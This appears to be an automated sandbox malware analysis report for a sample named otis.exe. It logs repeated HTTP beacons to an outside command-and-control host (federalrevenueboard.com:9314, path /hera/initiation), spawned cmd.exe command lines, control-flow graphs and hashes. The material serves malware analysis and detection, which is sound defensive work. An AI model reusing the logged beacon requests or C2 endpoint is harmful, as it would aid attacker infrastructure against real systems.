      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      1192.168.2.45544291.132.92.23193146840C:\Users\user\Desktop\otis.exe
      TimestampBytes transferredDirectionData
      Nov 13, 2024 08:13:56.663345098 CET103OUTGET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1
      Host: federalrevenueboard.com:9314
      Nov 13, 2024 08:13:57.594269037 CET199INHTTP/1.1 200 OK
      Server: Werkzeug/3.0.4 Python/3.10.12
      Date: Wed, 13 Nov 2024 07:13:57 GMT
      Content-Type: application/json
      Content-Length: 359
      Access-Control-Allow-Origin: *
      Connection: close


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      2192.168.2.45544491.132.92.23193146840C:\Users\user\Desktop\otis.exe
      TimestampBytes transferredDirectionData
      Nov 13, 2024 08:14:11.705224991 CET103OUTGET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1
      Host: federalrevenueboard.com:9314
      Nov 13, 2024 08:14:20.120095015 CET199INHTTP/1.1 200 OK
      Server: Werkzeug/3.0.4 Python/3.10.12
      Date: Wed, 13 Nov 2024 07:14:20 GMT
      Content-Type: application/json
      Content-Length: 359
      Access-Control-Allow-Origin: *
      Connection: close


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      3192.168.2.45544691.132.92.23193146840C:\Users\user\Desktop\otis.exe
      TimestampBytes transferredDirectionData
      Nov 13, 2024 08:14:41.943820000 CET103OUTGET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1
      Host: federalrevenueboard.com:9314
      Nov 13, 2024 08:14:42.851872921 CET199INHTTP/1.1 200 OK
      Server: Werkzeug/3.0.4 Python/3.10.12
      Date: Wed, 13 Nov 2024 07:14:42 GMT
      Content-Type: application/json
      Content-Length: 359
      Access-Control-Allow-Origin: *
      Connection: close


      Session IDSource IPSource PortDestination IPDestination Port
      4192.168.2.45544891.132.92.2319314
      TimestampBytes transferredDirectionData
      Nov 13, 2024 08:14:50.562774897 CET103OUTGET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1
      Host: federalrevenueboard.com:9314
      Nov 13, 2024 08:14:51.470612049 CET199INHTTP/1.1 200 OK
      Server: Werkzeug/3.0.4 Python/3.10.12
      Date: Wed, 13 Nov 2024 07:14:51 GMT
      Content-Type: application/json
      Content-Length: 359
      Access-Control-Allow-Origin: *
      Connection: close


      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:0
      Start time:02:11:44
      Start date:13/11/2024
      Path:C:\Users\user\Desktop\otis.exe
      Wow64 process (32bit):false
      Commandline:"C:\Users\user\Desktop\otis.exe"
      Imagebase:0x27245cb0000
      File size:22'016 bytes
      MD5 hash:3D922C89C5F0F8F9A738BEC3A24D0494
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:false

      Target ID:4
      Start time:02:12:22
      Start date:13/11/2024
      Path:C:\Windows\System32\cmd.exe
      Wow64 process (32bit):false
      Commandline:"cmd.exe" /k echo smyytbFVD4:936905/user
      Imagebase:0x7ff694970000
      File size:289'792 bytes
      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:5
      Start time:02:12:23
      Start date:13/11/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7699e0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:7
      Start time:02:14:01
      Start date:13/11/2024
      Path:C:\Windows\System32\cmd.exe
      Wow64 process (32bit):false
      Commandline:"cmd.exe" /k echo smyytbFVD4:936905/user
      Imagebase:0x7ff694970000
      File size:289'792 bytes
      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:8
      Start time:02:14:01
      Start date:13/11/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7699e0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:9
      Start time:02:14:24
      Start date:13/11/2024
      Path:C:\Windows\System32\cmd.exe
      Wow64 process (32bit):false
      Commandline:"cmd.exe" /k echo smyytbFVD4:936905/user
      Imagebase:0x7ff694970000
      File size:289'792 bytes
      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:10
      Start time:02:14:24
      Start date:13/11/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7699e0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:11
      Start time:02:14:47
      Start date:13/11/2024
      Path:C:\Windows\System32\cmd.exe
      Wow64 process (32bit):false
      Commandline:"cmd.exe" /k echo smyytbFVD4:936905/user
      Imagebase:0x7ff694970000
      File size:289'792 bytes
      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:12
      Start time:02:14:47
      Start date:13/11/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7699e0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Reset < >

        Execution Graph

        Execution Coverage:12%
        Dynamic/Decrypted Code Coverage:100%
        Signature Coverage:0%
        Total number of Nodes:3
        Total number of Limit Nodes:0
        execution_graph 13910 7ffd9b88a1d4 13911 7ffd9b88a1dd LoadLibraryExW 13910->13911 13913 7ffd9b88a28d 13911->13913

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 493 7ffd9b893bfd-7ffd9b893c01 494 7ffd9b893c09 493->494 495 7ffd9b893c03 493->495 496 7ffd9b893c0b 494->496 497 7ffd9b893c0c-7ffd9b893c1d 494->497 495->494 496->497 498 7ffd9b893c1f 497->498 499 7ffd9b893c20-7ffd9b893c31 497->499 498->499 500 7ffd9b893c33 499->500 501 7ffd9b893c34-7ffd9b893c45 499->501 500->501 502 7ffd9b893c47 501->502 503 7ffd9b893c48-7ffd9b893c59 501->503 502->503 504 7ffd9b893c5b 503->504 505 7ffd9b893c5c-7ffd9b893c6d 503->505 504->505 506 7ffd9b893c6f 505->506 507 7ffd9b893c70-7ffd9b893c81 505->507 506->507 508 7ffd9b893c83 507->508 509 7ffd9b893c84-7ffd9b893cd0 507->509 508->509 511 7ffd9b893ce1-7ffd9b893d0d 509->511 512 7ffd9b893cd2-7ffd9b893cdd 509->512 517 7ffd9b893f0a-7ffd9b893f3d 511->517 518 7ffd9b893d13-7ffd9b893d1c 511->518 512->511 522 7ffd9b893f44-7ffd9b893fa4 517->522 519 7ffd9b893d2d-7ffd9b893d86 518->519 520 7ffd9b893d1e-7ffd9b893d27 518->520 535 7ffd9b893dd5-7ffd9b893deb 519->535 536 7ffd9b893d88-7ffd9b893d9f 519->536 520->519 520->522 537 7ffd9b893fa6-7ffd9b893fba 522->537 538 7ffd9b893fc4-7ffd9b893fda 522->538 543 7ffd9b893dfb-7ffd9b893e15 535->543 544 7ffd9b893ded-7ffd9b893dfa 535->544 547 7ffd9b893da1 536->547 548 7ffd9b893da3-7ffd9b893dce 536->548 537->538 545 7ffd9b893fdc-7ffd9b893fe4 538->545 546 7ffd9b893ff2-7ffd9b89401b 538->546 554 7ffd9b893ea8-7ffd9b893eb3 543->554 555 7ffd9b893e1b-7ffd9b893e7c 543->555 544->543 550 7ffd9b893fe8-7ffd9b893feb 545->550 562 7ffd9b89401d 546->562 563 7ffd9b894024-7ffd9b894033 546->563 547->548 548->535 550->546 560 7ffd9b893eb5-7ffd9b893ef2 554->560 561 7ffd9b893e9b-7ffd9b893ea6 554->561 573 7ffd9b893ef3-7ffd9b893f09 555->573 581 7ffd9b893e7e-7ffd9b893e9a 555->581 560->573 561->573 562->563 566 7ffd9b894035 563->566 567 7ffd9b89403c-7ffd9b894049 563->567 566->567 567->550 568 7ffd9b89404b-7ffd9b89408e 567->568 575 7ffd9b894097-7ffd9b8940a3 568->575 576 7ffd9b894090-7ffd9b894095 568->576 578 7ffd9b8940a5-7ffd9b8940b9 575->578 576->578 584 7ffd9b894127-7ffd9b894143 578->584 585 7ffd9b8940bb-7ffd9b894120 578->585 581->561 585->584
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3496706804.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_7ffd9b880000_otis.jbxd
        Similarity
        • API ID:
        • String ID: e[_H
        • API String ID: 0-141660485
        • Opcode ID: d99e304a3b49f068b58a847146d177a0b2e7a5eeeec2f3fd03381439e317a041
        • Instruction ID: 553e2ae38d2107452f880efdebf23d4f02204f751e536870811a7dc08d11d10f
        • Opcode Fuzzy Hash: d99e304a3b49f068b58a847146d177a0b2e7a5eeeec2f3fd03381439e317a041
        • Instruction Fuzzy Hash: 1D024930B0DA894FEF69E7689825AB97BE1EF9A314F1400BEE05DC71D7DD24A842C741

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 1033 7ffd9b893268-7ffd9b8944fc 1036 7ffd9b894546 1033->1036 1037 7ffd9b8944fe-7ffd9b894529 1033->1037 1038 7ffd9b894588-7ffd9b89458b 1036->1038 1039 7ffd9b894548-7ffd9b89454b 1036->1039 1040 7ffd9b89452b-7ffd9b89452e 1037->1040 1041 7ffd9b894582-7ffd9b894586 1037->1041 1044 7ffd9b8945d5-7ffd9b89461c 1038->1044 1045 7ffd9b89458d-7ffd9b8945ad 1038->1045 1046 7ffd9b8945cc-7ffd9b8945cd 1039->1046 1047 7ffd9b89454d-7ffd9b894561 1039->1047 1042 7ffd9b8945af-7ffd9b8945b2 1040->1042 1043 7ffd9b894530-7ffd9b894532 1040->1043 1041->1038 1053 7ffd9b8945b4-7ffd9b8945b9 1042->1053 1048 7ffd9b8945ae 1043->1048 1049 7ffd9b894534 1043->1049 1056 7ffd9b8946d8-7ffd9b8946dc 1044->1056 1057 7ffd9b894622-7ffd9b894652 1044->1057 1050 7ffd9b8945cf 1046->1050 1051 7ffd9b8945d0-7ffd9b8945d3 1046->1051 1085 7ffd9b894568-7ffd9b89456b call 7ffd9b893218 1047->1085 1048->1042 1054 7ffd9b894576-7ffd9b89457b 1049->1054 1055 7ffd9b894536-7ffd9b894538 1049->1055 1050->1051 1051->1044 1060 7ffd9b8945ba-7ffd9b8945bb 1053->1060 1062 7ffd9b89457c-7ffd9b894581 1054->1062 1055->1053 1061 7ffd9b89453a 1055->1061 1064 7ffd9b894706-7ffd9b89470a 1056->1064 1065 7ffd9b8946de-7ffd9b894705 call 7ffd9b893360 1056->1065 1111 7ffd9b894659-7ffd9b89466c call 7ffd9b8931e0 1057->1111 1066 7ffd9b8945bd 1060->1066 1067 7ffd9b8945be 1060->1067 1061->1062 1071 7ffd9b89453c-7ffd9b89453e 1061->1071 1069 7ffd9b89470c-7ffd9b89476f call 7ffd9b893370 1064->1069 1070 7ffd9b894770-7ffd9b894774 1064->1070 1065->1064 1066->1067 1068 7ffd9b8945c0-7ffd9b8945ca 1067->1068 1068->1046 1069->1070 1077 7ffd9b89477a-7ffd9b89477e 1070->1077 1078 7ffd9b89485e-7ffd9b894862 1070->1078 1071->1060 1075 7ffd9b894540 1071->1075 1075->1041 1080 7ffd9b894542-7ffd9b894544 1075->1080 1083 7ffd9b894eae-7ffd9b894ed5 1077->1083 1084 7ffd9b894784-7ffd9b8947a5 1077->1084 1081 7ffd9b894868-7ffd9b89486c 1078->1081 1082 7ffd9b8948fb-7ffd9b8948ff 1078->1082 1080->1036 1080->1068 1093 7ffd9b894d1b-7ffd9b894d42 1081->1093 1094 7ffd9b894872-7ffd9b8948a2 1081->1094 1086 7ffd9b89491c-7ffd9b894928 1082->1086 1087 7ffd9b894901-7ffd9b894918 1082->1087 1091 7ffd9b894edc-7ffd9b894eed 1083->1091 1096 7ffd9b8947ab-7ffd9b8947c4 1084->1096 1097 7ffd9b894dbd-7ffd9b894fab call 7ffd9b8950ad call 7ffd9b895102 call 7ffd9b895155 call 7ffd9b8951a8 1084->1097 1098 7ffd9b894570-7ffd9b894574 call 7ffd9b894582 1085->1098 1109 7ffd9b89492d-7ffd9b894940 1086->1109 1087->1086 1100 7ffd9b894eef 1091->1100 1101 7ffd9b894ef4-7ffd9b894fe8 call 7ffd9b8933a0 call 7ffd9b895102 call 7ffd9b895155 call 7ffd9b8951a8 1091->1101 1099 7ffd9b894d49-7ffd9b894d5a 1093->1099 1102 7ffd9b8948a9-7ffd9b8948d3 call 7ffd9b8931e8 1094->1102 1103 7ffd9b8948a4 1094->1103 1207 7ffd9b895032-7ffd9b89503f 1097->1207 1098->1054 1105 7ffd9b894d5c 1099->1105 1106 7ffd9b894d61-7ffd9b894d6c 1099->1106 1100->1101 1190 7ffd9b894feb-7ffd9b895023 1101->1190 1120 7ffd9b8948d8-7ffd9b8948f8 1102->1120 1103->1102 1105->1106 1114 7ffd9b894d6e-7ffd9b894e66 call 7ffd9b8950ad 1106->1114 1115 7ffd9b894d82-7ffd9b894d97 1106->1115 1118 7ffd9b8949bd-7ffd9b8949d0 1109->1118 1119 7ffd9b894942-7ffd9b894c33 1109->1119 1130 7ffd9b894671-7ffd9b894684 1111->1130 1114->1091 1215 7ffd9b894e68-7ffd9b894fd6 call 7ffd9b893340 call 7ffd9b895102 call 7ffd9b895155 call 7ffd9b8951a8 1114->1215 1135 7ffd9b894d99-7ffd9b894d9a 1115->1135 1136 7ffd9b894da1-7ffd9b894dbc 1115->1136 1128 7ffd9b894a0e-7ffd9b894a28 call 7ffd9b8932b8 1118->1128 1129 7ffd9b8949d2-7ffd9b8949db 1118->1129 1158 7ffd9b894c3a-7ffd9b894c4d 1119->1158 1120->1082 1143 7ffd9b894a2d-7ffd9b894a33 1128->1143 1137 7ffd9b8949ed-7ffd9b894a04 1129->1137 1138 7ffd9b8949dd-7ffd9b8949e3 1129->1138 1148 7ffd9b894686-7ffd9b89469a call 7ffd9b8932a8 1130->1148 1135->1136 1136->1097 1137->1128 1157 7ffd9b894a06-7ffd9b894a07 1137->1157 1138->1137 1150 7ffd9b894a35-7ffd9b894a4b 1143->1150 1151 7ffd9b894a6e-7ffd9b894a81 1143->1151 1166 7ffd9b89469f-7ffd9b8946ba 1148->1166 1178 7ffd9b894a4d 1150->1178 1179 7ffd9b894a4f-7ffd9b894a6c call 7ffd9b881b30 1150->1179 1162 7ffd9b894a87-7ffd9b894a8c call 7ffd9b893380 1151->1162 1163 7ffd9b894c98-7ffd9b894ca7 1151->1163 1157->1128 1158->1086 1165 7ffd9b894c53-7ffd9b894c5c 1158->1165 1162->1163 1169 7ffd9b894ca9 1163->1169 1170 7ffd9b894cae-7ffd9b894cd3 1163->1170 1176 7ffd9b894c6e-7ffd9b894c85 1165->1176 1177 7ffd9b894c5e-7ffd9b894c64 1165->1177 1166->1190 1191 7ffd9b8946c0-7ffd9b8946d7 call 7ffd9b893350 1166->1191 1169->1170 1170->1099 1194 7ffd9b894cd5-7ffd9b894fcc call 7ffd9b893340 call 7ffd9b8950ad call 7ffd9b895102 call 7ffd9b895155 call 7ffd9b8951a8 1170->1194 1176->1086 1196 7ffd9b894c8b-7ffd9b894c93 1176->1196 1177->1176 1178->1179 1179->1151 1210 7ffd9b894a91-7ffd9b894aaa call 7ffd9b893390 1179->1210 1208 7ffd9b895025 1190->1208 1209 7ffd9b895027-7ffd9b89502b 1190->1209 1191->1056 1194->1207 1196->1086 1208->1209 1209->1207 1210->1086 1218 7ffd9b894ab0-7ffd9b894ad8 1210->1218 1215->1207 1228 7ffd9b894ada-7ffd9b894b1b call 7ffd9b893340 1218->1228 1229 7ffd9b894b4e-7ffd9b894b61 1218->1229 1228->1229 1251 7ffd9b894dd3-7ffd9b894ddb call 7ffd9b8950ad 1228->1251 1230 7ffd9b894b9f-7ffd9b894bc4 1229->1230 1231 7ffd9b894b63-7ffd9b894b6c 1229->1231 1230->1158 1246 7ffd9b894bc6-7ffd9b894c07 call 7ffd9b893340 1230->1246 1234 7ffd9b894b7e-7ffd9b894b95 1231->1234 1235 7ffd9b894b6e-7ffd9b894b74 1231->1235 1234->1230 1249 7ffd9b894b97-7ffd9b894b98 1234->1249 1235->1234 1262 7ffd9b894de0-7ffd9b894de8 call 7ffd9b8950ad 1246->1262 1249->1230 1261 7ffd9b894f29-7ffd9b894f31 call 7ffd9b895102 1251->1261 1251->1262 1268 7ffd9b894f33-7ffd9b894f3b call 7ffd9b895102 1261->1268 1269 7ffd9b894f71-7ffd9b894f79 call 7ffd9b895155 1261->1269 1262->1268 1274 7ffd9b894f7b-7ffd9b894f83 call 7ffd9b895155 1268->1274 1269->1274 1275 7ffd9b894fb0-7ffd9b894fb8 call 7ffd9b8951a8 1269->1275 1280 7ffd9b894fba-7ffd9b894fc2 call 7ffd9b8951a8 1274->1280 1275->1207 1275->1280 1280->1207
        Memory Dump Source
        • Source File: 00000000.00000002.3496706804.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_7ffd9b880000_otis.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 878b659fa81973bd8c2525abd548fdb5f2c658b3892068099cff18b92c5dde9b
        • Instruction ID: 66032dbf9e2d01fe7eff2d018167775d89e326da2ba607510e541958e51412db
        • Opcode Fuzzy Hash: 878b659fa81973bd8c2525abd548fdb5f2c658b3892068099cff18b92c5dde9b
        • Instruction Fuzzy Hash: A4826D30B09A4E8FEFA8EF58C465AA977A1FF98300F554179D41EC7296CE34E942CB41
        Memory Dump Source
        • Source File: 00000000.00000002.3496706804.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_7ffd9b880000_otis.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: a1129761014ca4424e51c87dabc6cea2e0946cda0fe2412550d08e10c20002cb
        • Instruction ID: 8f01581fe97565552daac39c92c2137c93d28edb8cc729990a077974ed80250f
        • Opcode Fuzzy Hash: a1129761014ca4424e51c87dabc6cea2e0946cda0fe2412550d08e10c20002cb
        • Instruction Fuzzy Hash: 6DE11722F0DA5E4BE7B89769846523977C1EF89310F5A117DE4AEC31E2EE3CA9424341

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 681 7ffd9b88a1d4-7ffd9b88a1db 682 7ffd9b88a1e6-7ffd9b88a24f 681->682 683 7ffd9b88a1dd-7ffd9b88a1e5 681->683 686 7ffd9b88a259-7ffd9b88a28b LoadLibraryExW 682->686 687 7ffd9b88a251-7ffd9b88a256 682->687 683->682 688 7ffd9b88a28d 686->688 689 7ffd9b88a293-7ffd9b88a2ba 686->689 687->686 688->689
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.3496706804.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_7ffd9b880000_otis.jbxd
        Similarity
        • API ID: LibraryLoad
        • String ID:
        • API String ID: 1029625771-0
        • Opcode ID: 43f1d7a651c6a5f1a392b3d9ab62fae84173d67492b5b5fb6e2dcf8b381b6a5c
        • Instruction ID: 0078bfe863a613f13bbfeada1feb07df7fc547b347f56aed80292dc1568521fb
        • Opcode Fuzzy Hash: 43f1d7a651c6a5f1a392b3d9ab62fae84173d67492b5b5fb6e2dcf8b381b6a5c
        • Instruction Fuzzy Hash: 6031253190CA4C9FDB59DBA89845BE9BBF0FF59320F00822FD009C3191DB74A806CB91